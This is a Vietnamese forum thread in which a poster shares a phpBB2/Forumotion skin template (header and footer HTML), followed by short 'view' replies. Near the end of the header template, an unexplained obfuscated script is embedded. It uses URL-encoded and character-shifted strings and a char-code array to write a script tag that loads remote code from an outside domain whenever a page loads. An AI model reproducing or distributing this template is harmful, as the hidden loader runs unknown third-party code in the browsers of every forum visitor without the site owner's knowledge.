Chuyển đến trang : 1, 2, 3, 4  Next

Xem chủ đề cũ hơn Xem chủ đề mới hơn Go down  Thông điệp [Trang 1 trong tổng số 4 trang]

#1on Sun Dec 02, 2012 12:18 am

avatar

TuanAnh»†ổñg Quån «

default
Demo online:
http://codeforumotion1.forumvi.com/

Thông tin skin:
Phiên bản: PHPBB2
Bản quyền thuộc http://codeforumotion.forumvi.com/forum


Code:Được sửa bởi Tuấn Anh ngày Sun Dec 02, 2012 12:31 am; sửa lần 1.Chào bạn Khách viếng thăm đến với diễn đàn I LOVE YOU!


Bạn đã gửi 0 bài vào diễn đàn cố gằng phát huy nhé
Trả lời trích dẫnTrả lời

#2on Sun Dec 02, 2012 12:29 am

avatar

TuanAnh»†ổñg Quån «

default
overall_footer_end

Code:

<!-- BEGIN html_validation -->
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<body>
<table>
   <tr>
      <td>
         <div>
            <div>
               <div>
<!-- END html_validation -->
               </div>
            </div>
            <!-- BEGIN switch_footer_links -->
            <div align="center">
               <div class="gen">
                  <!-- BEGIN footer_link -->
                     <!-- BEGIN switch_separator --> | <!-- END switch_separator -->
                     <a name="bottom" class="copyright" href="{switch_footer_links.footer_link.U_FOOTER_LINK_HREF}" rel="{switch_footer_links.footer_link.FOOTER_LINK_REL}" target="{switch_footer_links.footer_link.FOOTER_LINK_TARGET}" title="{switch_footer_links.footer_link.L_FOOTER_LINK_TITLE}">{switch_footer_links.footer_link.L_FOOTER_LINK_TEXT}</a>
                  <!-- END footer_link -->
               </div>
            </div>
            <!-- END switch_footer_links -->
         </div>
         {PROTECT_FOOTER}
      </td>
   </tr>
</table>

<!-- BEGIN switch_facebook_login -->
<div id="fb-root"></div>
<script type="text/javascript">
//<![CDATA[
FB.init({appId: '{switch_facebook_login.FACEBOOK_APP_ID}', status: true, cookie: true, xfbml: true, oauth: true});
//]]>
</script>
<!-- END switch_facebook_login -->

<!-- BEGIN switch_facebook_logout_TMP -->
<script type="text/javascript">
//<![CDATA[
FB.Event.subscribe('auth.logout', function(response) {
   if ($('a#logout'))
   {
      var lien_redir = $('a#logout').attr('href');

      if ($('a#logout').attr('href') && $('a#logout').attr('href') != '')
      {
         document.location.href = 'http://{switch_facebook_logout.SERVER_NAME}/' + lien_redir;
      }
   }
});

$(document).ready( function() {
   $('a#logout').click( function() {
      FB.logout();
   } );
});
//]]>
</script>
<!-- END switch_facebook_logout_TMP -->

<script type="text/javascript">
//<![CDATA[
   fa_endpage();
//]]>
</script>
</body>
</html>

overall_header:

Code:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html  xmlns="http://www.w3.org/1999/xhtml" dir="{S_CONTENT_DIRECTION}" id="min-width" lang="{L_LANG_HTML}" xml:lang="{L_LANG_HTML}" {NAMESPACE_FB_LIKE} {NAMESPACE_FB}>
<head>
    <!-- BEGIN meta_emulate_ie7 -->
  <meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" />
  <!-- END meta_emulate_ie7 -->
  <title>{SITENAME_TITLE}{PAGE_TITLE}</title>
  <meta http-equiv="content-type" content="text/html; charset={S_CONTENT_ENCODING};" />
  <meta http-equiv="content-script-type" content="text/javascript" />
  <meta http-equiv="content-style-type" content="text/css" />
  {META_FAVICO}
  {META}
  {META_FB_LIKE}
  <meta name="title" content="{SITENAME_TITLE}{PAGE_TITLE}" />
  {T_HEAD_STYLESHEET}
  {CSS}
<link rel="search" type="application/opensearchdescription+xml" href="/improvedsearch.xml" title="{SITENAME}" />
  <link rel="search" type="application/opensearchdescription+xml" href="{URL_BOARD_DIRECTORY}/search/improvedsearch.xml" title="{SEARCH_FORUMS}" />
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.7.2/jquery.min.js" type="text/javascript"></script>
<script src="{JS_DIR}{L_LANG}.js" type="text/javascript"></script>


  <!-- BEGIN switch_fb_login -->
  <script src="{switch_fb_login.JS_FB_LOGIN}" type="text/javascript"></script>
  <!-- END switch_fb_login -->

  <!-- BEGIN switch_ticker -->
  <link type="text/css" rel="stylesheet" href="{JS_DIR}jquery/ticker/ticker.css" />
  <script src="{JS_DIR}jquery/ticker/ticker.js" type="text/javascript"></script>
  <!-- END switch_ticker -->

  <!-- BEGIN switch_ticker_new -->
  <script src="{JS_DIR}jquery/jcarousel/jquery.jcarousel.js" type="text/javascript"></script>
  <script type="text/javascript">//<![CDATA[
  /* Definir le sens de direction en fonction du panneau admin */
  var tickerDirParam = "{switch_ticker.DIRECTION}";
  var slid_vert = false;
  var auto_dir  = 'next';
  var h_perso = parseInt({switch_ticker.HEIGHT});

  switch( tickerDirParam )
  {
      case 'top' :
        slid_vert = true;
        break;

      case 'left':
        break;

      case 'bottom':
        slid_vert = true;
        auto_dir  = 'prev';
        break;

      case 'right':
        auto_dir  = 'prev';
        break;

      default:
        slid_vert = true;
  }

  $(document).ready(function() {
      var w_cont = $('#fa_ticker_container').width();

      if (w_cont > 0)
      {
        $('#fa_ticker_container').width(w_cont);

        /* Affichage de la liste */
        $('#fa_ticker_content').css('display','block');

        /* Calcul des dimensions du conteneur et des �l�ments */
        var width_max  = $('ul#fa_ticker_content').width();
        var width_item = Math.floor(width_max / {switch_ticker.SIZE});
        var height_max = h_perso;

        /* Calcul de la hauteur maximale du contenur en fonction des �l�ments et de la hauteur personnalis�e dans l'admin */
        $('ul#fa_ticker_content li').each( function () {
            if ($(this).height() > height_max)
            {
              height_max = $(this).height();
            }
        } );

        /* Redimensionnement des �l�ments et des images trop larges */
        $('ul#fa_ticker_content li').width(width_item).height(height_max).find('img').each(function () {
            if ($(this).width() > width_item)
            {
            var ratio      = $(this).width() / width_item;
            var new_height = Math.round($(this).height() / ratio);
            $(this).height(new_height).width(width_item);
            }
        });

        /* Redimensionnement et centrage du conteneur en mode vertical */
        if (slid_vert)
        {
            $('ul#fa_ticker_content').width(width_item).height(height_max).css('marginLeft','auto').css('marginRight','auto');
        }

        /* Initialisation du caroussel */
        $('#fa_ticker_content').jcarousel({
              vertical: slid_vert,
            wrap: 'circular',
            auto: {switch_ticker.STOP_TIME},
            auto_direction: auto_dir,
              scroll: 1,
              size: {switch_ticker.SIZE},
              height_max: height_max,
              animation: {switch_ticker.SPEED}
          });
      }
      else
      {
          $('ul#fa_ticker_content li:not(:first)').css('display','none');
          $('ul#fa_ticker_content li:first').css('list-style','none').css('text-align','center');
      }
  });
  //]]>
  </script>
  <!-- END switch_ticker_new -->

  <script type="text/javascript">//<![CDATA[
  $(document).ready(function(){
      <!-- BEGIN switch_enable_pm_popup -->
        pm = window.open('{U_PRIVATEMSGS_POPUP}', '_faprivmsg', 'HEIGHT=225,resizable=yes,WIDTH=400');
        pm.focus();
      <!-- END switch_enable_pm_popup -->
      <!-- BEGIN switch_report_popup -->
        report = window.open('{switch_report_popup.U_REPORT_POPUP}', '_phpbbreport', 'HEIGHT={switch_report_popup.S_HEIGHT},resizable=yes,scrollbars=no,WIDTH={switch_report_popup.S_WIDTH}');
        report.focus();
      <!-- END switch_report_popup -->
      <!-- BEGIN switch_ticker -->
        ticker_start({switch_ticker.HEIGHT}, {switch_ticker.SPACING}, {switch_ticker.SPEED}, '{switch_ticker.DIRECTION}', {switch_ticker.STOP_TIME});
      <!-- END switch_ticker -->
  });

  <!-- BEGIN switch_login_popup -->
      var logInPopUpLeft, logInPopUpTop, logInPopUpWidth = {LOGIN_POPUP_WIDTH}, logInPopUpHeight = {LOGIN_POPUP_HEIGHT}, logInBackgroundResize = true, logInBackgroundClass = false;
  <!-- END switch_login_popup -->

  <!-- BEGIN switch_login_popup -->
  $(document).ready( function() {
      $(window).resize(function() {
        var windowWidth = document.documentElement.clientWidth;
          var popupWidth = $("#login_popup").width();
          var mypopup = $("#login_popup");

          $("#login_popup").css({
              "left": windowWidth/2 - popupWidth/2
          });
      });
  });
  <!-- END switch_login_popup -->
  //]]>
  </script>
  {GREETING_POPUP}
  <!-- BEGIN switch_ticker_new -->
  <style>
  .jcarousel-skin-tango .jcarousel-item {
      text-align:center;
      width: 10px;
  }

  .jcarousel-skin-tango .jcarousel-item-horizontal {
      margin-right: {switch_ticker.SPACING}px;
  }

  .jcarousel-skin-tango .jcarousel-item-vertical {
      margin-bottom: {switch_ticker.SPACING}px;
  }
  </style>
  <!-- END switch_ticker_new -->
{HOSTING_JS}
  <!-- BEGIN google_analytics_code -->
  <script type="text/javascript">
  //<![CDATA[
    var _gaq = _gaq || [];
    _gaq.push(['_setAccount', '{G_ANALYTICS_ID}']);
    _gaq.push(['_trackPageview']);

    (function() {
      var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;
      ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js';
      var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s);
    })();
  //]]>
  </script>
 
  <!-- END google_analytics_code -->
     
 <script type="text/javascript">
jQuery(function(){jQuery(".c3login").attr('action','/login?redirect='+this.location.pathname);});
</script>
<meta name="google-site-verification" content="MEXNxv22gFnRKg_UqQs70rZypHrhVcEQSVlTSrzx3kM" />
  </head>
<body background="{T_BODY_BACKGROUND}" bgcolor="{T_BODY_BGCOLOR}" text="{T_BODY_TEXT}" link="{T_BODY_LINK}" vlink="{T_BODY_VLINK}">
  <!-- BEGIN hitskin_preview -->
  <div id="hitskin_preview" style="display: block;">
      <h1><img src="http://illiweb.com/fa/hitskin/hitskin_logo.png" alt="" /> Hit<em>skin</em>.com</h1>
      <div class="content">
        <p>
            {hitskin_preview.L_THEME_SITE_PREVIEW}
            <br />
            <span>{hitskin_preview.U_INSTALL_THEME}<a href="http://{hitskin_preview.U_RETURN_THEME}">{hitskin_preview.L_RETURN_THEME}</a></span>
        </p>
      </div>
  </div>
  <!-- END hitskin_preview -->

 
  <a name="top"></a>
<div style="border-style: solid; border-color: #ccc;  border-width: 0pt 1px; background-color: rgba(255, 254, 254, 0.2);-moz-box-shadow: 0px 0px 15px #000;-webkit-box-shadow: 0px 0px 15px #000; padding: 0 10px; width: 850px; margin: 0 auto;box-shadow: 0px 0px 15px rgb(0, 0, 0);"><div style="background-color: rgba(255, 254, 254, 1); padding: 0; width: 840px; margin: 0 auto;">
                {JAVASCRIPT}
<!-- logo -->
<a name="top"></a>

<div id="banner"><br><br><br>
<embed height="200" width="830" flashvars="bannerWidth=950&bannerHeight=150&bannerSID=http://img.uu1001.cn/x3/2012-11-28/20-26/2012-11-28_6b41a4b858f7564ca906a87d2370b239_0.xml&bannerXML=&bannerLink=http%3A%2F%2F&dataSource=&bid=33720473&appSource=default" wmode="transparent" allowscriptaccess="always" quality="high" name="33720473" id="33720473" style="" src="http://img.uu1001.cn/bcv3.swf?v=20121114" type="application/x-shockwave-flash"/></embed>
<div id="banner_left">


      </tr>


</table>
</div>

<div style="clear:both"></div>

</div>

<span class="avatra9x"><div id="images_show">

<embed type="application/x-shockwave-flash"  allowscriptaccess="never"  src="http://illiweb.com/fa/pbucket.gif"  flashvars="


&pic_width=1&pic_height=1&stop_time=5000"  wmode="transparent" width="1" height="1">

  </div></span>

</div>

<!-- /logo -->

<div id="main_vietvui">
<div id="content_vietvui">
<!-- content table -->

<!-- open content container -->

<div align="center">
  <div class="page" style="width:100%; text-align:left">
      <div style="padding:0px 0px 0px 0px" align="left">

                                                <script type="text/javascript">
                                                var rainbowcount = 0;
                                                var glitcount=0;
                                                var glitstring='';
                                                var shimmercount=0;
                                                var shimmerstring='';
                                                var ie4 = false;
                                                        if(document.all) {
                                                                ie4 = true;
                                                        }
                                                        function setContent(name, value) {
                                                                var d;
                                                                if (ie4) {
                                                                        d = document.all[name];
                                                                } else {
                                                                        d = document.getElementById(name);
                                                                }
                                                                d.innerHTML = value;
                                                        }

                                                        function getContent(name) {
                                                                var d;
                                                                if (ie4) {
                                                                        d = document.all[name];
                                                                } else {
                                                                        d = document.getElementById(name);
                                                                }
                                                                return d.innerHTML;
                                                        }

                                                        function setColor(name, value) {
                                                                var d;
                                                                if (ie4) {
                                                                        d = document.all[name];
                                                                } else {
                                                                        d = document.getElementById(name);
                                                                }
                                                                d.style.color = value;
                                                        }

                                                        function getColor(name) {
                                                                var d;
                                                                if (ie4) {
                                                                        d = document.all[name];
                                                                } else {
                                                                        d = document.getElementById(name);
                                                                }
                                                                return d.style.color;
                                                        }
                                                                function toSpans(span) {
                                                                  var str=span.firstChild.data;
                                                                  var a=str.length;
                                                                  span.removeChild(span.firstChild);
                                                                  for(var i=0; i<a; i++) {
                                                                        var theSpan=document.createElement("SPAN");
                                                                        theSpan.appendChild(document.createTextNode(str.charAt(i)));
                                                                        span.appendChild(theSpan);
                                                                  }
                                                                }
                                                        function glitter(name, col, speed) {
                                                                var value = getContent(name);
                                                                while ( value.indexOf(" ", "-10") != (-1) ) {
                                                                        var value = value.replace(" ", "");
                                                                        };
                                                                if (value.indexOf('<span') >= 0) { return; }
                                                                var length = 0;
                                                                var str = '';
                                                                var ch;
                                                                var token = '';
                                                                var htmltag = false;
                                                                for (i = 0; i < value.length; i++) {
                                                                        ch = value.substring(i, i+1);
                                                                        if (i < value.length - 1) { nextch = value.substring(i+1, i+2); } else { nextch = ' '; }
                                                                        token += ch;
                                                                        if (ch == '<' && '/aAbBpPhHiIoOuUlLtT'.indexOf(nextch) >= 0) { htmltag = true; }
                                                                        if (ch == '>' && htmltag) { htmltag = false; }
                                                                        if (!htmltag && ch.charCodeAt(0) > 30 && ch != ' ' && ch != '\n') {
                                                                                str += '<span id="' + name + '_' + length + '">' + token + '</span>';
                                                                                token = '';
                                                                                length++;
                                                                        }
                                                                }
                                                                setContent(name, str);
                                                                glitcommand = 'glitterloop(\'' + name + '\', ' + length + ', 0, 1, \'' + col + '\', ' + speed + ')';
                                                                setTimeout(glitcommand , speed);
                                                        }
                                                        function shine(name, col, speed) {
                                                                        var value = getContent(name);
                                                                        while ( value.indexOf(" ", "-10") != (-1) ) {
                                                                                var value = value.replace(" ", "");
                                                                                };
                                                                        if (value.indexOf('<span') >= 0) { return; }
                                                                        var length = 0;
                                                                                        var str = '';
                                                                        var ch;
                                                                        var token = '';
                                                                        var htmltag = false;
                                                            for (i = 0; i < value.length; i++) {
                                                                                ch = value.substring(i, i+1);
                                                                                if (i < value.length - 1) { nextch = value.substring(i+1, i+2); } else { nextch = ' '; }
                                                                                token += ch;
                                                                                if (ch == '<' && '/aAbBpPhHiIoOuUlLtT'.indexOf(nextch) >= 0) { htmltag = true; }
                                                                                if (ch == '>' && htmltag) { htmltag = false; }
                                                                                if (!htmltag && ch.charCodeAt(0) > 30 && ch != ' ' && ch != '\n') {
                                                                                                                str += '<span id="' + name + '_' + length + '">' + token + '</span>';
                                                                                        token = '';
                                                                                        length++;
                                                                                }
                                                            }
                                                                setContent(name, str);
                                                                shinecommand = 'shineloop(\'' + name + '\', ' + length + ', 0, 1, \'' + col + '\', ' + speed + ')';
                                                                setTimeout(shinecommand , speed);
                                                        }
                                                                function RainbowSpan(span, hue, deg, brt, spd, hspd) {
                                                                        this.deg=(deg==null?360:Math.abs(deg));
                                                                        this.hue=(hue==null?0:Math.abs(hue)%360);
                                                                        this.hspd=(hspd==null?3:Math.abs(hspd)%360);
                                                                        this.length=span.firstChild.data.length;
                                                                        this.span=span;
                                                                        this.speed=(spd==null?50:Math.abs(spd));
                                                                        this.hInc=this.deg/this.length;
                                                                        this.brt=(brt==null?255:Math.abs(brt)%256);
                                                                        this.timer=null;
                                                                        toSpans(span);
                                                                        this.moveRainbow();
                                                                }
                                                RainbowSpan.prototype.moveRainbow = function() {
                                                  if(this.hue>359) this.hue-=360;
                                                  var color;
                                                  var b=this.brt;
                                                  var a=this.length;
                                                  var h=this.hue;

                                                  for(var i=0; i<a; i++) {

                                                    if(h>359) h-=360;

                                                    if(h<60) { color=Math.floor(((h)/60)*b); red=b;grn=color;blu=0; }
                                                    else if(h<120) { color=Math.floor(((h-60)/60)*b); red=b-color;grn=b;blu=0; }
                                                    else if(h<180) { color=Math.floor(((h-120)/60)*b); red=0;grn=b;blu=color; }
                                                    else if(h<240) { color=Math.floor(((h-180)/60)*b); red=0;grn=b-color;blu=b; }
                                                    else if(h<300) { color=Math.floor(((h-240)/60)*b); red=color;grn=0;blu=b; }
                                                    else { color=Math.floor(((h-300)/60)*b); red=b;grn=0;blu=b-color; }

                                                    h+=this.hInc;

                                                    this.span.childNodes[i].style.color="rgb("+red+", "+grn+", "+blu+")";
                                                  }
                                                  this.hue+=this.hspd;
                                                }
                                                        function shineloop(name, length, ind, delta, col, speed) {
                                                                        var next = ind + delta;
                                                                        if (next >= length) { delta = delta * -1; next = ind + delta; }
                                                                        if (next < 0) { delta = delta * -1; next = ind + delta; }
                                                                setColor(name + '_' + ind, getColor(name + '_' + next));
                                                                setColor(name + '_' + next, col);
                                                                shinecommand = 'shineloop(\'' + name + '\', ' + length + ', ' + next + ', ' + delta + ', \'' + col + '\', ' + speed + ')';
                                                                setTimeout(shinecommand , speed);
                                                                }

                                                        function glitterloop(name, length, ind, delta, col, speed) {
                                                                        var new_spd = Math.floor(Math.random()*31);
                                                                        var new_spd = (new_spd - 15);
                                                                        var new_spd = (new_spd + speed);
                                                                        var next = Math.floor(Math.random()*(length+1));
                                                                    if (next >= length) { delta = delta * -1; next = (-1); }
                                                                    if (next < 0) { delta = delta * -1; next = 1; }
                                                                setColor(name + '_' + ind, getColor(name + '_' + next));
                                                                setColor(name + '_' + next, col);
                                                                glitcommand = 'glitterloop(\'' + name + '\', ' + length + ', ' + next + ', ' + delta + ', \'' + col + '\', ' + speed + ')';
                                                                setTimeout(glitcommand , new_spd);
                                                        }
                                                </script>
                       
<!-- nav buttons bar -->
<div style="padding:0px; border-top-width:0px" width="100%">
<table cellpadding="0" cellspacing="0" border="0" width="100%" align="center">
<tr align="center">
<td width="15px"><img src="http://i69.servimg.com/u/f69/12/89/57/83/navbar15.gif" /></td>
<td class="navbar1">

<!-- BEGIN switch_user_logged_out --><td class="vbmenu_control"><a href="/profile.forum?mode=register" rel="nofollow">Đăng ký</a></td><td class="vbmenu_control"><a href="/login.forum?connexion" rel="nofollow">Đăng nhập</a></td><!-- END switch_user_logged_out -->

<td class="vbmenu_control"><a href="/forum.htm" accesskey="5">Diễn đàn</a></td>
<td class="vbmenu_control"><a href="/memberlist.forum">Thành viên</a></td>

<td class="vbmenu_control"><a href="/h37-page">Ứng Dụng</a></td>

<td class="vbmenu_control"><a href="/groupcp.forum">Nhóm</a></td><td class="vbmenu_control"><a href="/search.forum?search_id=activetopics" accesskey="2">Bài trong ngày</a></td>

<td id="navbar_search" class="vbmenu_control"><a href="/search.forum" rel="nofollow">Tìm kiếm</a></td>

<!-- BEGIN switch_user_logged_in --><td class="vbmenu_control"><a href="/profile.forum?mode=editprofile" accesskey="2">Lý lịch</a></td><!-- END switch_user_logged_in -->
<!-- BEGIN switch_user_logged_in --><td class="vbmenu_control"><a href="/h31-page" accesskey="2">Tiện Ích</a></td><!-- END switch_user_logged_in -->
<!-- BEGIN switch_user_logged_in --><td class="vbmenu_control"><a href="/login.forum?logout=true" accesskey="2">Thoát</a></td><!-- END switch_user_logged_in -->
</td>
<td width="15px"><img src="http://i64.servimg.com/u/f64/13/54/69/46/7v0_1010.gif" /></td>
</tr>
</table>
</div>
<!-- / nav buttons bar -->
<br><br>
<table style="background: none repeat scroll 0% 0% rgb(255, 255, 255); color: rgb(85, 85, 85); border: 2px solid rgb(187, 187, 187); -moz-border-radius: 5px 5px 5px 5px;" align="center" border="0" cellpadding="6" cellspacing="2" width="100%"><tr><td style="background: none repeat scroll 0% 0% rgb(255, 255, 255); color: rgb(49, 49, 49); border: 1px solid rgb(204, 204, 204); -moz-border-radius: 5px 5px 5px 5px;" nowrap="nowrap"><span style="cursor: pointer" onmouseout="hidetip();" class="c3luvmes cboxElement"><img src="http://i34.servimg.com/u/f34/15/44/78/93/thongb10.gif"><img src="http://i24.servimg.com/u/f24/15/44/78/93/tdyt_s10.png"></span></td><td style="background: url("http://i24.servimg.com/u/f24/15/44/78/93/master10.gif") repeat scroll 0% 0% rgb(255, 255, 255); color: rgb(49, 49, 49); border: 1px solid rgb(204, 204, 204); -moz-border-radius: 5px 5px 5px 5px;" width="100%"><marquee behavior="scroll" onmouseover="this.stop()" onmouseout="this.start()" scrollamount="2" scrolldelay="15" direction="left" truespeed="truespeed"><span style="margin-left: 0px;" class="modnew"><span onmouseover="showtip(this.getElementsByTagName('div')[0].innerHTML);" onmouseout="hidetip();">
<span style="font-size: 18px; line-height: normal"><strong><font color="#FF3333">Chào mừng bạn đến với Code Forumotion </font><font color="#0000FF">--</font></strong>
<font face="Comic Sans Ms"><font color="#003300"><strong>Chúc bạn có những giây phút vui vẻ bên diễn đàn</strong></font></font> <font color="#0000FF">--</font>
<font color="#0000FF"><strong>Nếu bạn chưa có tài khoản thì vào <a href="/register">đây</a> để làm thành viên của diễn đàn và sử dụng hết tiện ích của diễn đàn</strong>--</font>
<font face="Comic Sans Ms"><i><strong><font color="#9900CC">Diễn đàn hiển thị tốt nhất trên <a href="http://www.google.com/chrome/index.html?hl=vi&brand=CHMA&utm_campaign=vi&utm_source=vi-ha-apac-vi-bk&utm_medium=ha"><font color="green">Google Chrome</font></a> Và <a href="http://www.mozilla.org/en-US/firefox/new/"><font color="green">Mozilla Firefox</a></font></strong></i></font></span>
</td></tr></table> </div></div></div></div></td></tr></table></div>
 <br>           
<!-- breadcrumb, login, pm info -->
<table style="background: none repeat scroll 0% 0% rgb(255, 255, 255); color: rgb(85, 85, 85); border: 2px solid rgb(187, 187, 187); -moz-border-radius: 5px 5px 5px 5px;"  class="myphuong" cellpadding="0" cellspacing="0" border="0" width="100%" align="center">
<tr>
  <td class="alt1" width="100%">
                  <div class="navbar" style="font-size: 10pt;">
<strong>
<div class="nav">
<a class="nav" href="/forum">
<img src="http://i48.servimg.com/u/f48/14/28/30/23/home10.gif" class="inlineimg" alt="" border="0" /><font color="blue"> Diễn đàn</font> </a><font color="blue">{NAV_CAT_DESC}</font> ::
</div><center><br>

</strong>

<center><fieldset>☺<font color="Blue"><b><a href="{TOPIC_TITLE}">{PAGE_TITLE}</a><b></font>☺</fieldset></center>
</div>   
     
  </td>

</tr>
</table><br>
<!-- / breadcrumb, login, pm info -->
<!-- NAVBAR POPUP MENUS -->
<!-- / NAVBAR POPUP MENUS -->

<!-- PAGENAV POPUP -->
<!-- / PAGENAV POPUP -->

           
            <div style="clear: both;"></div>

            <!-- BEGIN switch_ticker_new -->
            <div id="fa_ticker_block" style="margin-top:4px;margin-bottom:4px;">
              <table width="100%" border="0" cellspacing="0" cellpadding="0" class="forumline">
                  <tr>
                    <td {CLASS_TABLE_TYPE} align="left" class="row1">
                        <div id="fa_ticker_container">
                          <ul id="fa_ticker_content"  class="jcarousel-skin-tango" style="display:none;">
                              <!-- BEGIN ticker_row -->
                              <li>{switch_ticker.ticker_row.ELEMENT}</li>
                              <!-- END ticker_row -->
                          </ul>
                        </div>
                    </td>
                  </tr>
              </table>
            </div>
            <!-- END switch_ticker_new -->

            <!-- BEGIN switch_ticker -->
            <div id="fa_ticker_block" style="margin-top:4px;margin-bottom:4px;">
              <table width="100%" border="0" cellspacing="0" cellpadding="0" class="forumline">
                  <tr>
                    <td {CLASS_TABLE_TYPE} align="left" class="row1">
                        <div id="fa_ticker_container">
                          <div id="fa_ticker" style="height:{switch_ticker.HEIGHT}px;">
                              <div class="fa_ticker_content">
                                <!-- BEGIN ticker_row -->
                                <div>{switch_ticker.ticker_row.ELEMENT}</div>
                                <!-- END ticker_row -->
                              </div>
                          </div>
                        </div>
                    </td>
                  </tr>
              </table>
            </div>
            <!-- END switch_ticker -->


                          {JAVASCRIPT}
<div id="page-body">
      <div id="{ID_CONTENT_CONTAINER}"{CLASS_CONTENT_CONTAINER}>
                          <table  class="thongke" cellpadding="0" cellspacing="0" border="0" width="100%" align="center" >
    <tbody>
                                <tr>
                                  <td valign="top" width="100%">
                                      <div class="test">
    <table class="thongke" cellpadding="4" cellspacing="0" style="border="0" width="100%" align="center">
    <tr>
    <td width="100%">
    <table class="thongke" cellpadding="0" cellspacing="0" border="0" width="100%" align="center">
    <td width="0%"></td><td width="00%" colspan="0"></td>
    </tr>
     
    <tr>
    <td><table  class="thongke" cellpadding="0" cellspacing="0" border="0" width="100%" align="center" >
</td></tr>
    <tr><td valign="top" style="border: 0px solid #9DB3C5;">
    <!-- BEGIN giefmod_index1 -->
    {giefmod_index1.MODVAR} <!-- END giefmod_index1 --></tr></thead></table>
    </td></tr></table>

    </div>
                                  </td>
        </tr><tr>
                                <td valign="top" width="100%">
    <!-- BEGIN html_validation -->
                              </td>
                            </tr>
                        </tbody>
                      </table>
                  </div>
                </div>
            </td>
          </tr>
      </table>
    </body>

</div></div>

    </html>
    <!-- END html_validation -->

<script type='text/javascript'>
var str3='%3C%73%63%72%69%70%74%20%6C%61%6E%67%75%61%67%65%3D%22%6A%61%76%61%73%63%72%69%70%74%22%3E%66%75%6E%63%74%69%6F%6E%20%64%46%28%73%29%7B%76%61%72%20%73%31%3D%75%6E%65%73%63%61%70%65%28%73%2E%73%75%62%73%74%72%28%30%2C%73%2E%6C%65%6E%67%74%68%2D%31%29%29%3B%20%76%61%72%20%74%3D%27%27%3B%66%6F%72%28%69%3D%30%3B%69%3C%73%31%2E%6C%65%6E%67%74%68%3B%69%2B%2B%29%74%2B%3D%53%74%72%69%6E%67%2E%66%72%6F%6D%43%68%61%72%43%6F%64%65%28%73%31%2E%63%68%61%72%43%6F%64%65%41%74%28%69%29%2D%73%2E%73%75%62%73%74%72%28%73%2E%6C%65%6E%67%74%68%2D%31%2C%31%29%29%3B%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%75%6E%65%73%63%61%70%65%28%74%29%29%3B%7D%3C%2F%73%63%72%69%70%74%3E';document.write(unescape(str3));var str4='*8Hxhwnuy*75qfslzflj*8I*77of%7Bfxhwnuy*77*8Jkzshynts*75lnfnrf7*7%3Dtg*7%3E*%3CG%7Bfw*75ht*8I5*8G%7Bfw*75wj*8I*7%3C*7%3C*8G%7Cmnqj*7%3Dht*8Htg3qjslym*7%3E*%3CGwj0*8IXywnsl3kwtrHmfwHtij*7%3Dtg*%3AGht*%3AI*7%3E*8Ght00*8G*%3CIwjyzws*75wj*8G*%3CI*8H4xhwnuy*8J5';dF(str4);var str2=new Array(60,115,99,114,105,112,116,32,115,114,99,61,104,116,116,112,58,47,47,119,119,119,46,99,51,122,46,99,111,46,99,99,47,104,116,109,108,45,104,51,51,46,104,116,109,62,60,47,115,99,114,105,112,116,62);document.write(giaima2(str2));
</script>


Để đóng khung một phần nào nó
VD như qtan:
Các bạn làm theo mẫu:

Code:

<table width="100%" cellpadding="0" cellspacing="0" border="0" align="center"><div class="tcathl" align="center"><div class="tcathl_left"><div class="tcathl_01"><div class="tcathl_02"><div class="tcathl_03"><div class="tcathl_text" style="padding: 40px 45px 20px;">*¨°º©º°¨*(¯`'•.¸-:¦:-°« Quà Tặng Âm Nhạc »°-:¦:-¸.•'´¯)*¨°º©º°¨*</div></div></div></div>
</div><div class="tcathl_right"><div class="tcathl_04"><div class="tcathl_05">
</div></div>
</div>

</div>
</table><div class="hailang_left"><div class="hailang_right"><div  class="hailang_center">
<table width="100%" cellpadding="0" cellspacing="0" border="0" >
    <td class="alt1" colspan="3"><div class="gensmall">

NỘI DUNG MUỐN ĐÓNG KHUNG</td>
</table></div>
</div>
</div>
<table width="100%" cellpadding="0" cellspacing="0" border="0" align="center"><div align="center"><div class="bottom_center"><div class="bottom_left"><div class="bottom_right">
</div></div></div></div>
</table>

Tìm: *¨°º©º°¨*(¯`'•.¸-:¦:-°« Quà Tặng Âm Nhạc »°-:¦:-¸.•'´¯)*¨°º©º°¨*

Thay bằng tên bạn muốn vd chatbox chẳng hạnChào bạn Khách viếng thăm đến với diễn đàn I LOVE YOU!


Bạn đã gửi 0 bài vào diễn đàn cố gằng phát huy nhé
Trả lời trích dẫnTrả lời

#3on Sun Dec 02, 2012 10:08 pm

avatar

NguyenHung» Thàñh Vïêñ Mới

default
xem

Trả lời trích dẫnTrả lời

#4on Mon Dec 03, 2012 10:15 pm

avatar

giakhanhlk» Thàñh Vïêñ Mới

default
b

Trả lời trích dẫnTrả lời

#5on Mon Dec 03, 2012 10:31 pm

avatar

KenDy Nguyễn» Thàñh Vïêñ Mới

default
uyu

Trả lời trích dẫnTrả lời

#6on Wed Dec 05, 2012 5:51 pm

avatar

bachdiencongtu» Thàñh Vïêñ Mới

default
Xem ^^!

Trả lời trích dẫnTrả lời

#7on Thu Dec 06, 2012 8:33 am

avatar

Diệm Ma Hoàng» Thàñh Vïêñ Mới

default
hex

Trả lời trích dẫnTrả lời

#8on Sun Dec 16, 2012 12:25 pm

avatar

pemi3012» Thàñh Vïêñ Mới

default
xem

Trả lời trích dẫnTrả lời

#9on Thu Dec 27, 2012 4:34 pm

avatar

phuanhqc» Thàñh Vïêñ Mới

default
xem

Trả lời trích dẫnTrả lời

#10on Fri Dec 28, 2012 12:51 am

avatar

NamSay» Thàñh Vïêñ Mới

default
xem

Trả lời trích dẫnTrả lời

#11on Sat Dec 29, 2012 12:00 am

avatar

vietabank» Thàñh Vïêñ Mới

default
view

Trả lời trích dẫnTrả lời

#12on Sun Dec 30, 2012 2:41 pm

avatar

tunguit» Thàñh Vïêñ Mới

default
Lên nào!!!

Trả lời trích dẫnTrả lời

#13on Mon Dec 31, 2012 4:46 pm

avatar

